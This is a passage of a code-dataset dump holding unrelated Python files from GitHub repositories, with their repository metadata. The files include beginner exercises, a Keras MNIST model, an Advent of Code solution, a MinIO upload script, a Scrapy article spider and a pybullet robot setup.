divisor of given number n \r\n\r\nn = int(input(\"enter number: \"))\r\n\r\nfor i in range(2,n+1):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n\r\n\r\ni = 2\r\nwhile (i<=n):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n i += 1\r\n\r\n\r\n# print numbers in the given list which are not divisible by 5\r\n\r\n\r\nl = [10, 16, 17, 18, 20, 22, 35]\r\n\r\n\r\nfor x in l:\r\n if( x % 5 == 0):\r\n continue\r\n print(x,end = \" \")\r\n\r\n\r\n# print tables of numbers from 1 to n\r\n\r\nn = int(input(\"enter number : \"))\r\n\r\nfor i in range(1,n+1):\r\n print(i,\": \", end = \" \")\r\n for j in range(1,11):\r\n print(i*j, end = \" \")\r\n print()\r\n\r\ndef f(): pass\r\nprint(type(f()))\r\n\r\n\r\nn = int(input(\"enter number : \")) \r\n\r\nfor i in range(n):\r\n if i == 0:\r\n print(\"*\")\r\n elif i == n-1:\r\n print(\"*\"*n)\r\n else:\r\n print(\"*\",\" \"*(i-2),\"*\")\r\n \r\ndef fib(n):\r\n if (n == 1) or (n == 2):\r\n return 1\r\n res = fib(n-1) + fib(n-2)\r\n return res\r\n\r\nprint(fib(6))\r\n\r\na = int(input(\"enter number a : \")) \r\nb = int(input(\"enter number b : \")) \r\n\r\ndef gcd(a, b):\r\n \r\n # code here to calculate and return gcd of a and b\r\n counter = a if (a geeks for geeks\r\n pat -> geeks\r\n o/p -> 0 10\r\n'''\r\n\r\ntext = \"geeks for geeksgeeksgeefs geeksian \"\r\npat = \"geeks\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + len(pat) \r\n \r\n \r\n''' i/p : text -> AAAAA\r\n pat -> AAA\r\n o/p -> 0 1 2\r\n'''\r\n\r\n#method01\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + 1\r\n\r\n\r\n#method02\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\npos = text.find(pat)\r\nwhile pos >= 0:\r\n print(pos, end = \" \")\r\n pos = text.find(pat,pos+1)\r\n \r\n \r\ndef reverseString(s):\r\n #Write your code below to reverse s and return it\r\n s_list = list(s)\r\n reverse_string = []\r\n for i in range(len(s_list)):\r\n j = len(s_list)-(i+1)\r\n reverse_string.append(s_list[j])\r\n return \"\".join(reverse_string)\r\n\r\ndef reverseString(s):\r\n return 
s[::-1]\r\n\r\nprint(reverseString(\"hello\"))\r\n\r\n\r\n\r\n","repo_name":"arihantvyavhare/PythonStuff","sub_path":"py_basics01.py","file_name":"py_basics01.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20736963509","text":"import pickle\nimport os\n\nscores = list()\n\ndef input_scores():\n score=int(input())\n if score > 0:\n scores.append(score)\n return score \n\ndef get_average(scores):\n return sum(scores)/len(scores)\n\ndef show_scores(avg):\n print(\"개인점수:\",end=\" \")\n for i in scores:\n print(f\"{i}\",end=\" \")\n print()\n print(\"평균: \",avg)\n\ndef search(scores,score):\n count =0\n for i in scores:\n find=0\n count +=1\n if i == score:\n print(f\"{score}점은 {count}번 학생의 점수입니다.\")\n find = score\n break\n if find == 0:\n print(f\"{score}점을 받은 학생은 없습니다.\")\n\nfilepath = 'C:/Users/ahn/Desktop/mlData/'\nfilename = 'score.bin'\ndef save(scores):\n with open(f'{filepath}{filename}','wb') as file:\n pickle.dump(scores,file)\n\ndef load():\n with open(filename,'rb') as file:\n scores=pickle.load(file)\n return scores\n\ni=1\n\n \n\nif not(os.path.exists(filename)):\n while True: \n print(f\"#{i}?\",end=\" \")\n n = input_scores()\n i+=1\n if n<0:\n break\n save(scores)\nelse:\n result = load()\n avg = get_average(result)\n print('[파일 읽기]\\n')\n\n print('[점수 출력]')\n show_scores(avg)\n","repo_name":"ayz1070/python","sub_path":"python programming/hw10.py","file_name":"hw10.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37912505746","text":"from queue import Queue\n\nq = Queue()\nn = int(input())\nq.put(\"1\")\n\nwhile(n):\n\tn -= 1\n\n\ts1 = q.get()\n\n\tprint (s1)\n\n\ts2 = s1\n\n\tq.put(s1+\"0\")\n\n\tq.put(s2+\"1\")\n\n","repo_name":"pranavdave893/Leetcode","sub_path":"binary_with_queue.py","file_name":"binary_with_queue.py","file_ext":"py","file_size_in_byte":155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71819118509","text":"import pygame\nimport sys\nimport random\nfrom Block import *\n\nVERTICAL = 10\nHORIZONTAL = 15\nTAILLE_CASE = 40\n\nFENETRE = pygame.display.set_mode(size=(VERTICAL * TAILLE_CASE, HORIZONTAL * TAILLE_CASE))\nFPS = pygame.time.Clock()\n \n \nclass Cherry:\n def __init__(self):\n x = random.randint(0,VERTICAL -1)\n y = random.randint(0,HORIZONTAL -1)\n self.block = Block(x, y)\n \n def draw_Cherry(self):\n rect = pygame.Rect(self.block.x * TAILLE_CASE,self.block.y * TAILLE_CASE, TAILLE_CASE, TAILLE_CASE)\n pygame.draw.rect(FENETRE,(255, 56, 24), rect)","repo_name":"Evolinki/SnakePygame","sub_path":"Cherry.py","file_name":"Cherry.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29974759666","text":"import os\n\nimport keras\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import mnist\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\nprint(X_train.shape)\n# X_train = X_train.reshape(-1, 28 * 28) # without normalization\n# X_test = X_test.reshape(-1, 28 * 28)\n\nX_train = X_train.reshape(-1,28*28)/255.0 # Normalization increases accuracy\nX_test = X_test.reshape(-1,28*28)/255.0\nprint(X_train.shape)\n\n# Sequential API\n# model = keras.Sequential([ 
# passing layers as list to model.\n# keras.Input(shape=(28*28)),\n# layers.Dense(512, activation='relu'),\n# layers.Dense(256, activation='relu'),\n# layers.Dense(10)\n# ])\n# print(model.summary()) // if we include input layer.\n\n# Sequential API - 2\nmodel = keras.Sequential()\nmodel.add(layers.Input(shape=(28*28)))\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(256, activation='relu',name='my_layer'))\nmodel.add(layers.Dense(10))\n\nmodel = keras.Model(inputs = model.inputs,\n # outputs = [model.layers[-1].output]\n #outputs = [model.get_layer('my_layer').output] # We can access layers by their name.\n outputs = [layer.output for layer in model.layers])\n\nfeature = model.predict(X_train)\nfor features in feature:\n print(features.shape)\n# print('feature shape :',feature.shape)\n\n\n# Functional API\n# input = layers.Input(shape=(28 * 28))\n# x = layers.Dense(512, activation='relu',name='first_layer')(input)\n# x = layers.Dense(256, activation='relu',name='second_layer')(x)\n# output = layers.Dense(10, activation='softmax')(x)\n# model = keras.Model(inputs=input, outputs=output)\n\n# import sys\n# sys.exit()\nmodel.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True), # Only set it to True if you are not using softmax in model.\n optimizer=keras.optimizers.legacy.Adam(learning_rate=0.001),\n metrics=['accuracy']\n)\n\nmodel.fit(X_train, y_train, epochs=5, verbose=2)\nprint(model.summary())\nmodel.evaluate(X_test, y_test, verbose=2)\n","repo_name":"Asrar-Ahammad/tensorflowPractice","sub_path":"02_neuralNetwork.py","file_name":"02_neuralNetwork.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36893205637","text":"import time\nfrom utils import readInput\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadInput():\n lines = readInput(\"prova.txt\")\n lines = readInput(\"input_8.txt\")\n grid = np.zeros(shape=(len(lines[0]), len(lines)))\n\n for y in range(len(lines)):\n for x in range(len(lines[0])):\n grid[x, y] = int(lines[y][x])\n return grid\n\ndef draw_forest(grid):\n plt.imshow(grid)\n plt.show()\n\n\ndef part1(grid):\n xmax, ymax = grid.shape\n visible = np.zeros(shape=(xmax, ymax))\n\n for y in range(ymax):\n height = grid[0, y]\n visible[0, y] = 1\n for x in range(1, xmax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[-1, y]\n visible[-1, y] = 1\n for x in range(xmax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n for x in range(xmax):\n height = grid[x, 0]\n visible[x, 0] = 1\n for y in range(1, ymax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[x, -1]\n visible[x, -1] = 1\n for y in range(ymax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n print (\"🎄 Part 1: {}\".format(visible.sum()))\n\ndef part2(grid):\n xmax, ymax = grid.shape\n dirs = [(0, 1), (1, 0), (-1, 0), (0, -1)]\n scenic_score = 0\n for x in range(xmax):\n for y in range(ymax):\n score = []\n for d in dirs:\n steps = 1\n visible = 0\n while True:\n new_x, new_y = x + steps*d[0], y + steps*d[1]\n if 0 <= new_x < xmax and 0 <= new_y < ymax:\n if grid[new_x, new_y] < grid[x, y]:\n visible += 1\n else:\n visible += 1\n break\n else:\n break\n steps += 1\n score.append(visible)\n scenic_score = max(np.prod(score), scenic_score)\n\n print (\"🎄🎅 Part 2: 
{}\".format(scenic_score))\n\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\nprint(\"⛄ Day 8 ⛄\")\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\n\ngrid = loadInput()\ndraw_forest(grid)\nquit()\nt0 = time.time()\npart1(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n\nt0 = time.time()\npart2(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n","repo_name":"matteosan1/AoC","sub_path":"2022/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40017156529","text":"import io\nimport os\n\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom minio import Minio\nfrom pysus.online_data.CNES import download\nfrom pysus.online_data.sinasc import download as download_sinasc\n\nload_dotenv()\n\n\ndef csv_to_parquet():\n landing_bucket_name = \"landing\"\n curated_bucket_name = \"curated\"\n minio_endpoint = \"localhost:9100\"\n minio_access_key = os.getenv(\"minio_access_key\")\n minio_secret_key = os.getenv(\"minio_secret_key\")\n object_name_from = \"events-sample.csv\"\n object_name_to = \"events-sample.parquet\"\n\n client = Minio(\n minio_endpoint,\n access_key=minio_access_key,\n secret_key=minio_secret_key,\n secure=False\n )\n\n found = client.bucket_exists(landing_bucket_name)\n if not found:\n client.make_bucket(landing_bucket_name)\n else:\n print(f'Bucket {landing_bucket_name} já existe!')\n\n file = client.get_object(landing_bucket_name, object_name=object_name_from)\n\n df = pd.read_csv(file)\n bytes_data = df.to_parquet()\n buffer = io.BytesIO(bytes_data)\n\n print(buffer)\n client.put_object(\n curated_bucket_name,\n object_name_to,\n buffer,\n len(bytes_data),\n 'application/parquet'\n )\n\n\ndef download_cnes():\n df = download_sinasc('SE', 2015)\n print(\"OK: \" + df.head())\n df = download(group=\"ST\", state=\"DF\", year=2021, month=1, cache=True)\n print(\"OOOOK\")\n print(\"GO\" + df.head())\n\n\ndef cnes_download():\n print(\"!\")\n\n\n\nif __name__ == \"__main__\":\n download_cnes()\n","repo_name":"GleytonLima/datasus-elt","sub_path":"src/testes_local.py","file_name":"testes_local.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41259422736","text":"class Solution:\n def searchInsert(self, nums: 'List[int]', target: 'int') -> 'int':\n lens = len(nums)\n l, r = 0, lens-1\n while l <= r:\n mid = int((l+r)/2)\n if nums[mid] < target:\n l = mid+1\n else:\n r = mid-1\n # if l-1>=0 and nums[l] \n return l\n\nif __name__ == \"__main__\":\n print(\n Solution().searchInsert(\n [1, 2, 3, 4, 5], 2.5\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0035/35.py","file_name":"35.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38619335597","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import Model\nfrom keras.layers import Permute, Dense, LayerNormalization, Embedding\nimport tensorflow_addons as tfa\nfrom .layers import quick_gelu, Layer\n\nclass CLIPAttention(Layer):\n def __init__(self):\n super().__init__()\n self.emb_dim = 768\n self.num_heads = 12\n self.head_dim = self.emb_dim // self.num_heads\n self.scale = self.head_dim ** -0.5\n self.q_proj = Dense(self.emb_dim)\n self.k_proj = Dense(self.emb_dim)\n self.v_proj = Dense(self.emb_dim)\n self.out_proj = Dense(self.emb_dim)\n\n def _shape(self, tensor, seq_len: 
int, batch_size: int):\n a = tf.reshape(tensor, (batch_size, seq_len, self.num_heads, self.head_dim))\n\n return Permute((2, 1, 3))(a) # bs, n_head, seq_len, head_dim\n\n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n batch_size, tgt_len, emb_dim = hidden_states.shape\n query_states = self.q_proj(hidden_states) * self.scale\n key_states = self._shape(self.k_proj(hidden_states), tgt_len, -1)\n value_states = self._shape(self.v_proj(hidden_states), tgt_len, -1)\n\n proj_shape = (-1, tgt_len, self.head_dim)\n query_states = self._shape(query_states, tgt_len, -1)\n query_states = tf.reshape(query_states, proj_shape)\n key_states = tf.reshape(key_states, proj_shape)\n\n src_len = tgt_len\n value_states = tf.reshape(value_states, proj_shape)\n attn_weights = query_states @ Permute((2, 1))(key_states)\n attn_weights = tf.reshape(attn_weights, (-1, self.num_heads, tgt_len, src_len))\n attn_weights = attn_weights + casual_attention_mask\n attn_weights = tf.reshape(attn_weights, (-1, tgt_len, src_len))\n\n attn_weights = tf.nn.softmax(attn_weights)\n attn_output = attn_weights @ value_states\n attn_output = tf.reshape(attn_output, (-1, self.num_heads, tgt_len, self.head_dim))\n attn_output = Permute((2, 1, 3))(attn_output)\n attn_output = tf.reshape(attn_output, (-1, tgt_len, emb_dim))\n\n return self.out_proj(attn_output)\n \n\nclass CLIPEncoderLayer(Layer):\n def __init__(self):\n super().__init__()\n self.layer_norm1 = LayerNormalization(epsilon=1e-5)\n self.self_attn = CLIPAttention()\n self.layer_norm2 = LayerNormalization(epsilon=1e-5)\n self.fc1 = Dense(3072)\n self.fc2 = Dense(768)\n \n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n residual = hidden_states\n \n hidden_states = self.layer_norm1(hidden_states)\n hidden_states = self.self_attn([hidden_states, casual_attention_mask])\n hidden_states = residual + hidden_states\n residual = hidden_states\n hidden_states = self.layer_norm2(hidden_states)\n hidden_states = self.fc1(hidden_states)\n hidden_states = quick_gelu(hidden_states)\n hidden_states = self.fc2(hidden_states)\n\n return residual + hidden_states\n\nclass CLIPEncoder(Layer):\n def __init__(self):\n super().__init__()\n self.layers = [CLIPEncoderLayer() for _ in range(12)]\n\n def call(self, x):\n [hidden_states, casual_attention_mask] = x\n for layer in self.layers:\n hidden_states = layer([hidden_states, casual_attention_mask])\n return hidden_states\n\n\nclass CLIPTextEmbedding(Layer):\n def __init__(self, n_words=77):\n super().__init__()\n # Token and Position Embedding Layer\n self.token_embedding = Embedding(\n 49408, 768, name=\"token_embedding\"\n )\n self.position_embedding = Embedding(\n n_words, 768, name=\"position_embedding\"\n )\n\n def call(self, x):\n input_ids, pos_ids = x\n word_embeddings = self.token_embedding(input_ids)\n pos_embeddings = self.position_embedding(pos_ids)\n\n return word_embeddings + pos_embeddings\n\nclass CLIPTextTransformer(Model):\n def __init__(self, n_words=77):\n super().__init__()\n self.embeddings = CLIPTextEmbedding(n_words=n_words)\n self.encoder = CLIPEncoder()\n self.final_layer_norm = LayerNormalization(epsilon=1e-5)\n self.casual_attention_mask = tf.constant(\n np.triu(np.ones((1, 1, 77, 77), dtype='float32') * -np.inf, k=1)\n )\n\n def call(self, inputs):\n input_ids, pos_ids = inputs\n x = self.embeddings([input_ids, pos_ids])\n x = self.encoder([x, self.casual_attention_mask])\n\n return self.final_layer_norm(x)\n 
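The record above reimplements CLIP's text encoder (multi-head self-attention under a causal mask, GELU MLP blocks, and summed token plus position embeddings) in plain Keras. A minimal, hedged smoke test for such a stack is sketched below; the batch size, the 77-token context length, and the zero-valued dummy ids are illustrative assumptions, the weights are untrained, and the snippet presumes the classes defined in that record are importable from the surrounding module:

import numpy as np
# Hypothetical shape check for the CLIPTextTransformer defined above.
model = CLIPTextTransformer(n_words=77)
token_ids = np.zeros((1, 77), dtype='int32')     # placeholder token ids
pos_ids = np.arange(77, dtype='int32')[None, :]  # position indices 0..76
hidden = model([token_ids, pos_ids])
print(hidden.shape)  # expected: (1, 77, 768)

Only the output shape is verified here; real use would load pretrained CLIP weights and feed tokenizer output rather than zeros.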
","repo_name":"Raghvender1205/AI_From_Scratch","sub_path":"DiffusionModels/StableDiffusion/stablediffusion/clip_encoder.py","file_name":"clip_encoder.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"38"} +{"seq_id":"7466316408","text":"# importing the requests library\nimport requests\nimport json\nimport logging\nimport datetime\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',\n )\n\nclass Request:\n # defining the api-endpoint\n API_ENDPOINT = \"http://192.168.0.11:3000/listnotes\"\n\n # your API key here\n API_KEY = \"XXXXXXXXXXXXXXXXX\"\n\n acc = {'aX': [],\n 'aY': [],\n 'aZ': []}\n\n mag = {'mX': [],\n 'mY': [],\n 'mZ': []}\n\n timestamp = '1000111111'\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n data = {'title': 'msg from node number correct',\n 'acc': acc,\n 'mag': mag,\n 'timestamp': timestamp}\n\n\n def sendPost(self,data):\n listValues = data['values']\n actualTime = str(round(datetime.datetime.now().timestamp(),2))\n dataPackage = {'title': 'meranickoRanicko', 'timestamp': actualTime, 'meranie': []}\n listValues = [x.replace(\"\\r\\n\",\"\") for x in listValues]\n for i in range(len(listValues)):\n aX, aY, aZ, mX, mY, mZ, actualTime = listValues[i].split(\",\")\n acc = {'aX': aX,\n 'aY': aY,\n 'aZ': aZ}\n\n mag = {'mX': int(mX),\n 'mY': int(mY),\n 'mZ': int(mZ)}\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n dataDictionary = {'acc': acc, 'mag': mag, 'timestamp': actualTime}\n dataPackage['meranie'].append(dataDictionary)\n\n # sending post request and saving response as response object\n # r = requests.post(url=Request.API_ENDPOINT, json=Request.data)\n # logging.debug(\"Sending Request with: %i elements\" % len(dataDictionary))\n\n r = requests.post(url=Request.API_ENDPOINT, json=dataPackage)\n\n # extracting response text\n pastebin_url = r.text\n # logging.debug(\"The pastebin URL is:%s\" % pastebin_url)\n","repo_name":"UserTomas/device_monitoring","sub_path":"Raspberry/APIrequests.py","file_name":"APIrequests.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"41801543812","text":"from typing import Set\n\nfrom typing_extensions import override\n\nfrom dbt_semantic_interfaces.enum_extension import assert_values_exhausted\nfrom dbt_semantic_interfaces.errors import ModelTransformError\nfrom dbt_semantic_interfaces.implementations.metric import PydanticMetricInputMeasure\nfrom dbt_semantic_interfaces.implementations.semantic_manifest import (\n PydanticSemanticManifest,\n)\nfrom dbt_semantic_interfaces.protocols import ProtocolHint\nfrom dbt_semantic_interfaces.transformations.transform_rule import (\n SemanticManifestTransformRule,\n)\nfrom dbt_semantic_interfaces.type_enums import MetricType\n\n\nclass AddInputMetricMeasuresRule(ProtocolHint[SemanticManifestTransformRule[PydanticSemanticManifest]]):\n \"\"\"Add all measures corresponding to the input metrics of the derived metric.\"\"\"\n\n @override\n def _implements_protocol(self) -> SemanticManifestTransformRule[PydanticSemanticManifest]: # noqa: D\n return self\n\n @staticmethod\n def _get_measures_for_metric(\n semantic_manifest: PydanticSemanticManifest, metric_name: str\n ) -> Set[PydanticMetricInputMeasure]:\n \"\"\"Returns a unique set of input measures for a given metric.\"\"\"\n measures: Set = set()\n matched_metric = next(\n 
iter((metric for metric in semantic_manifest.metrics if metric.name == metric_name)), None\n )\n if matched_metric:\n if matched_metric.type is MetricType.SIMPLE or matched_metric.type is MetricType.CUMULATIVE:\n assert (\n matched_metric.type_params.measure is not None\n ), f\"{matched_metric} should have a measure defined, but it does not.\"\n measures.add(matched_metric.type_params.measure)\n elif matched_metric.type is MetricType.DERIVED or matched_metric.type is MetricType.RATIO:\n for input_metric in matched_metric.input_metrics:\n measures.update(\n AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, input_metric.name)\n )\n else:\n assert_values_exhausted(matched_metric.type)\n else:\n raise ModelTransformError(f\"Metric '{metric_name}' is not configured as a metric in the model.\")\n return measures\n\n @staticmethod\n def transform_model(semantic_manifest: PydanticSemanticManifest) -> PydanticSemanticManifest: # noqa: D\n for metric in semantic_manifest.metrics:\n measures = AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, metric.name)\n assert len(metric.type_params.input_measures) == 0, f\"{metric} should not have measures predefined\"\n metric.type_params.input_measures = list(measures)\n\n return semantic_manifest\n","repo_name":"dbt-labs/dbt-semantic-interfaces","sub_path":"dbt_semantic_interfaces/transformations/add_input_metric_measures.py","file_name":"add_input_metric_measures.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"38"} +{"seq_id":"37527994613","text":"\"\"\"\nTask\nGiven n names and phone numbers, assemble a phone book that maps friends' names to their respective\nphone numbers. You will then be given an unknown number of names to query your phone book for. 
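For instance (an illustrative sample, not from the original problem statement): with n = 2 and the entries \"sam 99912222\" and \"tom 11122222\", the queries \"sam\" and \"edward\" would then arrive one per line until end of input. 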
\nFor each name queried, print the associated entry from your phone book on a new line in the form \nname=phoneNumber; if an entry for name is not found, print Not found instead.\n\nNote: Your phone book should be a Dictionary/Map/HashMap data structure.\n\"\"\"\n\nn = int(input())\nphoneBook = {}\n\n# Fill a phonebook\nfor i in range(0, n):\n entry = str(input()).split(\" \")\n name = entry[0]\n number = entry[1] \n phoneBook[name] = number\n \n# Use while loop because don't know how many name entries will be\nwhile True:\n try:\n name = input()\n except:\n break\n if name in phoneBook:\n number = phoneBook[name]\n print(name + \"=\" + number)\n else:\n print(\"Not found\")","repo_name":"irsol/hacker-rank-30-days-of-code","sub_path":"Day 8: Dictionaries and Maps.py","file_name":"Day 8: Dictionaries and Maps.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3887392463","text":"metadata = \"\"\"\nsummary @ Creates PKZIP-compatible .zip files\nhomepage @ http://www.info-zip.org/pub/infozip/Zip.html\nlicense @ Info-ZIP\nsrc_url @ ftp://ftp.info-zip.org/pub/infozip/src/$name30.zip\narch @ ~x86_64\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir = \"zip30\"\n\ndef build():\n make(\"-f unix/Makefile LOCAL_ZIP='%s' prefix=/usr generic_gcc\" % get_env(\"CFLAGS\"))\n\ndef install():\n raw_install(\"-f unix/Makefile INSTALL=/bin/install prefix=%s/usr \\\n MANDIR=%s/usr/share/man/man1\" % (install_dir, install_dir))\n\n insdoc(\"LICENSE\")\n","repo_name":"wdysln/new","sub_path":"app-arch/zip/zip-3.0.py","file_name":"zip-3.0.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"4588339274","text":"from impulse.root import root_mtg\nfrom openalea.plantgl.all import Viewer\n\ng = root_mtg.mtg_root()\n\ns = root_mtg.Simulate(g)\n\nfor i in range(100):\n s.step()\n scene = root_mtg.plot(g)\n Viewer.display(scene)\n\n\n","repo_name":"openalea-incubator/impulse","sub_path":"src/impulse/root/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74098695471","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\nfrom blogArticle.items import BlogArticleItem\n\n\nclass ArticleSpiderSpider(CrawlSpider):\n name = 'article_spider'\n allowed_domains = ['jianshu.com']\n start_urls = ['https://www.jianshu.com/p/61b9ef649461']\n\n rules = (\n Rule(LinkExtractor(allow=r'.*/p/[0-9a-z]{12}.*'), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n # 文章的标题 a_title\n title = response.xpath(\"//h1[@class='_1RuRku']/text()\").get()\n\n # 文章分类 对应item里面a_category\n category = 'Python'\n\n # 文章的发布时间 对应item里面的a_release_time ajax请求的数据,,\n release_time = response.xpath(\"//div[@class='s-dsoj']/time/text()\").get().replace(\".\", '-')\n\n # 文章的观看人数 对应item里面的a_watch_number ajax请求的数据\n read_number = response.xpath(\"//div[@class='s-dsoj']/span[last()]/text()\").get()\n read_number = int(read_number.split(\" \")[1].replace(\",\", '')) # 阅读 5,648 --> 5648 转成int\n\n # 文章的类容 对应item里面的a_content ajax请求的数据,\n content = \"\".join(response.xpath(\"//article[@class='_2rhmJa']\").getall())\n\n # 源地址 对应item里面的 a_origin\n origin = response.url.split(\"?\")[0]\n\n # 文章的简介 对应item里面a_introduce\n introduce = 
response.xpath(\"//article[@class='_2rhmJa']/blockquote/p/text()\").get()\n if not introduce:\n # 为空默认从文章中摘取一段\n introduce = response.xpath(\"//article[@class='_2rhmJa']/p[5]/text()\").get()\n\n # 文章简介图片 对应item里面a_introduce_img\n introduce_img = response.xpath(\"//article[@class='_2rhmJa']//img/@data-original-src\").get()\n\n item = BlogArticleItem(\n a_title=title,\n a_category=category,\n a_release_time=release_time,\n a_read_number=read_number,\n a_content=content,\n a_origin=origin,\n a_introduce=introduce,\n a_introduce_img=introduce_img,\n )\n\n yield item\n","repo_name":"Qunoal/blog-crawler","sub_path":"blogArticle/spiders/article_spider.py","file_name":"article_spider.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26343926878","text":"import pybullet as p\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\n# p.setAdditionalSearchPath(pybullet_data.getDataPath()) #this will load the plane urdf \np.connect(p.GUI)\np.configureDebugVisualizer(p.COV_ENABLE_GUI,0)\np.configureDebugVisualizer(p.COV_ENABLE_RGB_BUFFER_PREVIEW,0)\np.createCollisionShape(p.GEOM_PLANE)\nplId=p.createMultiBody(0,0)\np.resetDebugVisualizerCamera( cameraDistance=4, cameraYaw=10, cameraPitch=-20, \n cameraTargetPosition=[0.0, 0.0, 0.25])\np.setGravity(0,0,-10) #along the Z axis\n\n# planeId = p.loadURDF(\"plane.urdf\")\n\n#---loading the bodyId----:\nfootIdos = [0,0,1] # it will be spawned at z=1\nstartOrientation = p.getQuaternionFromEuler([0,0,0]) #angle at which it will be spawned\n\n\n#creating the robot:\nsh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\nsh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\nsh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\nsh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n\nbodyId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colBody, baseVisualShapeIndex = sh_visBody,\n basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\nfootId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colFoot,\n basePosition = [0,0,0.5],baseOrientation=[0,0,0,1])\n\n# base = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.1,0.1])\n# sh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\n# sh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\n# sh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n# sh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\n# Body_1 = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\n# sh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, 